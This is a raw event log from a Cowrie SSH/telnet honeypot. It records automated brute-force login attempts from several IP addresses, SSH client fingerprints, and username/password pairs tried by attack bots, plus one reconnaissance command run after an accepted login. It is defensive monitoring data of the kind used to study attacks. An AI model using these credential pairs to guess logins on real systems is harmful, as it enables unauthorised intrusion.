{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.727078Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.session.connect","src_ip":"213.225.3.25","src_port":33587,"dst_ip":"1.2.3.4","dst_port":22,"session":"02e7db99d76f","protocol":"ssh","message":"New connection: 213.225.3.25:33587 (1.2.3.4:22) [session: 02e7db99d76f]","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.781588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.783009Z","src_ip":"213.225.3.25","session":"02e7db99d76f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.841385Z","src_ip":"213.225.3.25","session":"02e7db99d76f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:15.145932Z","src_ip":"213.225.3.25","session":"02e7db99d76f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:16.199465Z","src_ip":"213.225.3.25","session":"02e7db99d76f"}
{"eventid":"cowrie.session.connect","src_ip":"213.225.3.25","src_port":33588,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c9fa2df0236","protocol":"ssh","message":"New connection: 213.225.3.25:33588 (1.2.3.4:22) [session: 7c9fa2df0236]","sensor":"my-vps","timestamp":"2025-08-26T19:36:16.238494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:36:16.239331Z","src_ip":"213.225.3.25","session":"7c9fa2df0236"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:36:16.300234Z","src_ip":"213.225.3.25","session":"7c9fa2df0236"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:36:16.558940Z","src_ip":"213.225.3.25","session":"7c9fa2df0236"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:16.613635Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:16.644928Z","src_ip":"213.225.3.25","session":"7c9fa2df0236"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":34473,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f617155e3d7","protocol":"ssh","message":"New connection: 80.94.95.15:34473 (1.2.3.4:22) [session: 7f617155e3d7]","sensor":"my-vps","timestamp":"2025-08-26T19:36:18.402623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:36:18.403387Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:36:18.489197Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane","message":"login attempt [dane/dane] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:19.224411Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane1","message":"login attempt [dane/dane1] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:20.312334Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane123","message":"login attempt [dane/dane123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:21.405601Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43910,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b9ef66578c3","protocol":"ssh","message":"New connection: 217.154.1.158:43910 (1.2.3.4:22) [session: 0b9ef66578c3]","sensor":"my-vps","timestamp":"2025-08-26T19:36:21.502183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:36:21.502878Z","src_ip":"217.154.1.158","session":"0b9ef66578c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:36:21.516997Z","src_ip":"217.154.1.158","session":"0b9ef66578c3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:21.560789Z","src_ip":"217.154.1.158","session":"0b9ef66578c3"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane1234","message":"login attempt [dane/dane1234] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:22.500827Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:22.576868Z","src_ip":"217.154.1.158","session":"0b9ef66578c3"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane12345","message":"login attempt [dane/dane12345] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:23.903295Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:24.987306Z","src_ip":"80.94.95.15","session":"7f617155e3d7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48942,"dst_ip":"1.2.3.4","dst_port":22,"session":"280843a342d9","protocol":"ssh","message":"New connection: 217.154.1.158:48942 (1.2.3.4:22) [session: 280843a342d9]","sensor":"my-vps","timestamp":"2025-08-26T19:36:39.126315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:36:39.127582Z","src_ip":"217.154.1.158","session":"280843a342d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:36:39.143973Z","src_ip":"217.154.1.158","session":"280843a342d9"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:36:39.243641Z","src_ip":"217.154.1.158","session":"280843a342d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:36:39.291936Z","src_ip":"217.154.1.158","session":"280843a342d9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:36:39.292621Z","src_ip":"217.154.1.158","session":"280843a342d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:39.308211Z","src_ip":"217.154.1.158","session":"280843a342d9"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:39.309141Z","src_ip":"217.154.1.158","session":"280843a342d9"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56091,"dst_ip":"1.2.3.4","dst_port":23,"session":"459f663a039d","protocol":"telnet","message":"New connection: 113.229.80.250:56091 (1.2.3.4:23) [session: 459f663a039d]","sensor":"my-vps","timestamp":"2025-08-26T19:36:51.450939Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56100,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee4ca4648d46","protocol":"telnet","message":"New connection: 113.229.80.250:56100 (1.2.3.4:23) [session: ee4ca4648d46]","sensor":"my-vps","timestamp":"2025-08-26T19:36:52.578357Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56111,"dst_ip":"1.2.3.4","dst_port":23,"session":"5095cdae525a","protocol":"telnet","message":"New connection: 113.229.80.250:56111 (1.2.3.4:23) [session: 5095cdae525a]","sensor":"my-vps","timestamp":"2025-08-26T19:36:54.477810Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":34746,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a02aeda2844","protocol":"ssh","message":"New connection: 217.154.1.158:34746 (1.2.3.4:22) [session: 9a02aeda2844]","sensor":"my-vps","timestamp":"2025-08-26T19:36:56.509790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:36:56.510452Z","src_ip":"217.154.1.158","session":"9a02aeda2844"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:36:56.524738Z","src_ip":"217.154.1.158","session":"9a02aeda2844"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:56.570145Z","src_ip":"217.154.1.158","session":"9a02aeda2844"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:57.587334Z","src_ip":"217.154.1.158","session":"9a02aeda2844"}
{"eventid":"cowrie.session.closed","duration":12.773333072662354,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:04.224174Z","src_ip":"113.229.80.250","session":"459f663a039d"}
{"eventid":"cowrie.session.closed","duration":12.539061069488525,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:05.117314Z","src_ip":"113.229.80.250","session":"ee4ca4648d46"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56286,"dst_ip":"1.2.3.4","dst_port":23,"session":"332e7356f1ad","protocol":"telnet","message":"New connection: 113.229.80.250:56286 (1.2.3.4:23) [session: 332e7356f1ad]","sensor":"my-vps","timestamp":"2025-08-26T19:37:05.296839Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56336,"dst_ip":"1.2.3.4","dst_port":23,"session":"35915803615a","protocol":"telnet","message":"New connection: 113.229.80.250:56336 (1.2.3.4:23) [session: 35915803615a]","sensor":"my-vps","timestamp":"2025-08-26T19:37:06.728830Z"}
{"eventid":"cowrie.session.closed","duration":12.67927861213684,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:07.157015Z","src_ip":"113.229.80.250","session":"5095cdae525a"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56372,"dst_ip":"1.2.3.4","dst_port":23,"session":"1285583c5523","protocol":"telnet","message":"New connection: 113.229.80.250:56372 (1.2.3.4:23) [session: 1285583c5523]","sensor":"my-vps","timestamp":"2025-08-26T19:37:07.414749Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56278,"dst_ip":"1.2.3.4","dst_port":23,"session":"c031575602bd","protocol":"telnet","message":"New connection: 113.229.80.250:56278 (1.2.3.4:23) [session: c031575602bd]","sensor":"my-vps","timestamp":"2025-08-26T19:37:11.425848Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59830,"dst_ip":"1.2.3.4","dst_port":22,"session":"915b02e59c28","protocol":"ssh","message":"New connection: 217.154.1.158:59830 (1.2.3.4:22) [session: 915b02e59c28]","sensor":"my-vps","timestamp":"2025-08-26T19:37:13.973801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:37:13.974983Z","src_ip":"217.154.1.158","session":"915b02e59c28"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:37:13.988928Z","src_ip":"217.154.1.158","session":"915b02e59c28"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:37:14.033749Z","src_ip":"217.154.1.158","session":"915b02e59c28"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:15.050997Z","src_ip":"217.154.1.158","session":"915b02e59c28"}
{"eventid":"cowrie.session.closed","duration":13.052555799484253,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:18.349286Z","src_ip":"113.229.80.250","session":"332e7356f1ad"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56555,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a9b2f27ae68","protocol":"telnet","message":"New connection: 113.229.80.250:56555 (1.2.3.4:23) [session: 2a9b2f27ae68]","sensor":"my-vps","timestamp":"2025-08-26T19:37:18.574360Z"}
{"eventid":"cowrie.session.closed","duration":13.690622568130493,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:20.419386Z","src_ip":"113.229.80.250","session":"35915803615a"}
{"eventid":"cowrie.session.closed","duration":13.051551103591919,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:20.466167Z","src_ip":"113.229.80.250","session":"1285583c5523"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56587,"dst_ip":"1.2.3.4","dst_port":23,"session":"539b8a60ff0d","protocol":"telnet","message":"New connection: 113.229.80.250:56587 (1.2.3.4:23) [session: 539b8a60ff0d]","sensor":"my-vps","timestamp":"2025-08-26T19:37:20.563476Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56588,"dst_ip":"1.2.3.4","dst_port":23,"session":"dbc613b2b26c","protocol":"telnet","message":"New connection: 113.229.80.250:56588 (1.2.3.4:23) [session: dbc613b2b26c]","sensor":"my-vps","timestamp":"2025-08-26T19:37:20.585150Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56597,"dst_ip":"1.2.3.4","dst_port":23,"session":"a484622f40fa","protocol":"telnet","message":"New connection: 113.229.80.250:56597 (1.2.3.4:23) [session: a484622f40fa]","sensor":"my-vps","timestamp":"2025-08-26T19:37:23.032751Z"}
{"eventid":"cowrie.session.closed","duration":12.781165361404419,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:24.206947Z","src_ip":"113.229.80.250","session":"c031575602bd"}
{"eventid":"cowrie.session.closed","duration":12.585636377334595,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.159930Z","src_ip":"113.229.80.250","session":"2a9b2f27ae68"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45886,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb6a70f86e0a","protocol":"ssh","message":"New connection: 217.154.1.158:45886 (1.2.3.4:22) [session: cb6a70f86e0a]","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.408010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.408823Z","src_ip":"217.154.1.158","session":"cb6a70f86e0a"}
